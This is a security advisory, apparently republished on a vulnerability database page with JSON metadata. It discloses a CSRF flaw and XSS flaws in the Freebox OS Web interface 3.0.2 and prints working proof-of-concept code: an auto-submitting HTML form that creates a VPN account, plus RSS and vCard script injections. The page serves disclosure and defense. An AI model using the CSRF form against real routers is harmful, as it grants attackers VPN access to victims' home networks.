Freebox OS Web interface 3.0.2 XSS, CSRF

2015-06-08T00:00:00

Description

Hello list, Here are two CVEs I reported to Freebox, a french ISP: - CVE-2014-9382 - CSRF in VPN user account creation - CVE-2014-9405 - XSS Vulnerable product: Freebox OS Web interface 3.0.2. CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation ==================== Risk level: High Freebox allows users to create VPN connections to their home network. In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/: {"login":"foo","password_set":false,"ip_reservation":"","password":"bar"} This request is vulnerable to CSRF which is easy to trigger. The following POC would create a new VPN account "ngocdh" / "1234=5678": <html> <body onload=vpn.submit()> <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain"> <input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&quot;password_set&quot;:false,&quot;ip_reservation&quot;:&quot;&quot;,&quot;password&quot;:&quot;1234" value="5678&quot;}" /> <input type="submit" value="Submit request" /> </form> </body> </html> CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2 ==================== Risk level: low Two XSS instances with low probability of exploitation were found in the following places: - Download RSS - Contacts The following POC demonstrates the XSS in the "description" field of a Download RSS item: <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>From Huy Ngoc</title> <description>huyngocbk@gmail.com</description> <link>http://google.com</link> <atom:link rel="hub" href="http://google.com"/> <atom:link rel="self" href="http://google.com"/> <item> <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description> <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate> <guid>http://google.com></guid> </item> </channel> </rss> In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed. The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface: BEGIN:VCARD VERSION:3.0 FN:DAU Huy Ngoc N:;;;; URL:<img src=/ onerror='alert(document.domain);'> END:VCARD In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf. Timeline: 21/11/2014: XSS CVE-2014-9382 is reported to vendor 21/11/2014: vendor confirmed the vulnerability 02/12/2014: CSRF CVE-2014-9405 is reported to vendor 06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867) Credit: DAU Huy Ngoc (@ngocdh)

{"id": "SECURITYVULNS:DOC:32184", "bulletinFamily": "software", "title": "Freebox OS Web interface 3.0.2 XSS, CSRF", "description": "\r\n\r\nHello list, \r\n\r\nHere are two CVEs I reported to Freebox, a french ISP:\r\n - CVE-2014-9382 - CSRF in VPN user account creation\r\n - CVE-2014-9405 - XSS\r\n\r\nVulnerable product: Freebox OS Web interface 3.0.2.\r\n\r\nCVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation\r\n====================\r\nRisk level: High\r\n\r\nFreebox allows users to create VPN connections to their home network. \r\n\r\nIn version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:\r\n\r\n{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}\r\n\r\nThis request is vulnerable to CSRF which is easy to trigger.\r\n\r\nThe following POC would create a new VPN account "ngocdh" / "1234=5678":\r\n\r\n<html>\r\n <body onload=vpn.submit()>\r\n <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">\r\n <input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&quot;password_set&quot;:false,&quot;ip_reservation&quot;:&quot;&quot;,&quot;password&quot;:&quot;1234" value="5678&quot;}" />\r\n <input type="submit" value="Submit request" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n\r\nCVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2\r\n====================\r\nRisk level: low\r\n\r\nTwo XSS instances with low probability of exploitation were found in the following places:\r\n- Download RSS\r\n- Contacts\r\n\r\nThe following POC demonstrates the XSS in the "description" field of a Download RSS item:\r\n\r\n<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">\r\n<channel>\r\n<title>From Huy Ngoc</title>\r\n<description>huyngocbk@gmail.com</description>\r\n<link>http://google.com</link>\r\n<atom:link rel="hub" href="http://google.com"/>\r\n<atom:link rel="self" href="http://google.com"/>\r\n <item>\r\n <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>\r\n <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>\r\n <guid>http://google.com></guid>\r\n </item> \r\n</channel> \r\n</rss>\r\n\r\nIn order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.\r\n\r\n\r\nThe following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:\r\n\r\nBEGIN:VCARD\r\nVERSION:3.0\r\nFN:DAU Huy Ngoc\r\nN:;;;;\r\nURL:<img src=/ onerror='alert(document.domain);'>\r\nEND:VCARD\r\n\r\nIn order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.\r\n\r\n\r\nTimeline:\r\n21/11/2014: XSS CVE-2014-9382 is reported to vendor\r\n21/11/2014: vendor confirmed the vulnerability\r\n02/12/2014: CSRF CVE-2014-9405 is reported to vendor\r\n06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)\r\n\r\nCredit: DAU Huy Ngoc (@ngocdh)\r\n\r\n", "published": "2015-06-08T00:00:00", "modified": "2015-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32184", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-9405", "CVE-2014-9382"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:59", "edition": 1, "viewCount": 41, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-9382", "CVE-2014-9405"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}]}, "exploitation": null, "vulnersScore": 4.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645375345}}

{"packetstorm": [{"lastseen": "2016-12-05T22:14:53", "description": "", "published": "2015-06-02T00:00:00", "type": "packetstorm", "title": "FreeBox 3.0.2 Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9405", "CVE-2014-9382"], "modified": "2015-06-02T00:00:00", "id": "PACKETSTORM:132121", "href": "https://packetstormsecurity.com/files/132121/FreeBox-3.0.2-Cross-Site-Request-Forgery-Cross-Site-Scripting.html", "sourceData": "`Hello list, \n \nHere are two CVEs I reported to Freebox, a french ISP: \n- CVE-2014-9382 - CSRF in VPN user account creation \n- CVE-2014-9405 - XSS \n \nVulnerable product: Freebox OS Web interface 3.0.2. \n \nCVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation \n==================== \nRisk level: High \n \nFreebox allows users to create VPN connections to their home network. \n \nIn version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/: \n \n{\"login\":\"foo\",\"password_set\":false,\"ip_reservation\":\"\",\"password\":\"bar\"} \n \nThis request is vulnerable to CSRF which is easy to trigger. \n \nThe following POC would create a new VPN account \"ngocdh\" / \"1234=5678\": \n \n<html> \n<body onload=vpn.submit()> \n<form name=\"vpn\" action=\"http://mafreebox.free.fr/api/v3/vpn/user/\" method=\"POST\" enctype=\"text/plain\"> \n<input type=\"hidden\" name=\"{\"login\":\"ngocdh\",\"password_set\":false,\"ip_reservation\":\"\",\"password\":\"1234\" value=\"5678\"}\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n \nCVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2 \n==================== \nRisk level: low \n \nTwo XSS instances with low probability of exploitation were found in the following places: \n- Download RSS \n- Contacts \n \nThe following POC demonstrates the XSS in the \"description\" field of a Download RSS item: \n \n<rss version=\"2.0\" xmlns:atom=\"http://www.w3.org/2005/Atom\"> \n<channel> \n<title>From Huy Ngoc</title> \n<description>huyngocbk@gmail.com</description> \n<link>http://google.com</link> \n<atom:link rel=\"hub\" href=\"http://google.com\"/> \n<atom:link rel=\"self\" href=\"http://google.com\"/> \n<item> \n<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror=\"alert(document.domain)\">]]></description> \n<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate> \n<guid>http://google.com></guid> \n</item> \n</channel> \n</rss> \n \nIn order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed. \n \n \nThe following VCF file demonstrates a XSS exploitation POC, \"alert(document.domain)\" would be called after importing this VCF file from the web interface: \n \nBEGIN:VCARD \nVERSION:3.0 \nFN:DAU Huy Ngoc \nN:;;;; \nURL:<img src=/ onerror='alert(document.domain);'> \nEND:VCARD \n \nIn order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf. \n \n \nTimeline: \n21/11/2014: XSS CVE-2014-9382 is reported to vendor \n21/11/2014: vendor confirmed the vulnerability \n02/12/2014: CSRF CVE-2014-9405 is reported to vendor \n06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867) \n \nCredit: DAU Huy Ngoc (@ngocdh) \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132121/freebox-xssxsrf.txt"}], "cve": [{"lastseen": "2022-03-23T15:25:09", "description": "A Cross-Site Scripting (XSS) vulnerability exists in the description field of an Download RSS item or Contacts in Freebox OS Web interface 3.0.2, which allows malicious users to execute arbitrary code.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-06T22:15:00", "type": "cve", "title": "CVE-2014-9405", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9405"], "modified": "2020-01-13T19:11:00", "cpe": ["cpe:/a:free:freebox_os:3.0.2"], "id": "CVE-2014-9405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9405", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:free:freebox_os:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:24:31", "description": "Freebox OS Web interface 3.0.2 has CSRF which can allow VPN user account creation", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-13T14:15:00", "type": "cve", "title": "CVE-2014-9382", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9382"], "modified": "2020-01-23T13:23:00", "cpe": ["cpe:/a:free:freebox_os:3.0.2"], "id": "CVE-2014-9382", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9382", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:free:freebox_os:3.0.2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:46:38", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2015-06-08T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3154", "CVE-2014-9405", "CVE-2015-3624", "CVE-2015-3648", "CVE-2015-4039", "CVE-2015-4337", "CVE-2014-9382", "CVE-2015-4084", "CVE-2015-4109", "CVE-2015-4336", "CVE-2015-3647", "CVE-2015-4038", "CVE-2015-3001", "CVE-2015-0850", "CVE-2015-4010", "CVE-2015-4153", "CVE-2015-4338", "CVE-2015-4050"], "modified": "2015-06-08T00:00:00", "id": "SECURITYVULNS:VULN:14523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14523", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Freebox OS Web interface 3.0.2 XSS, CSRF

Description

Related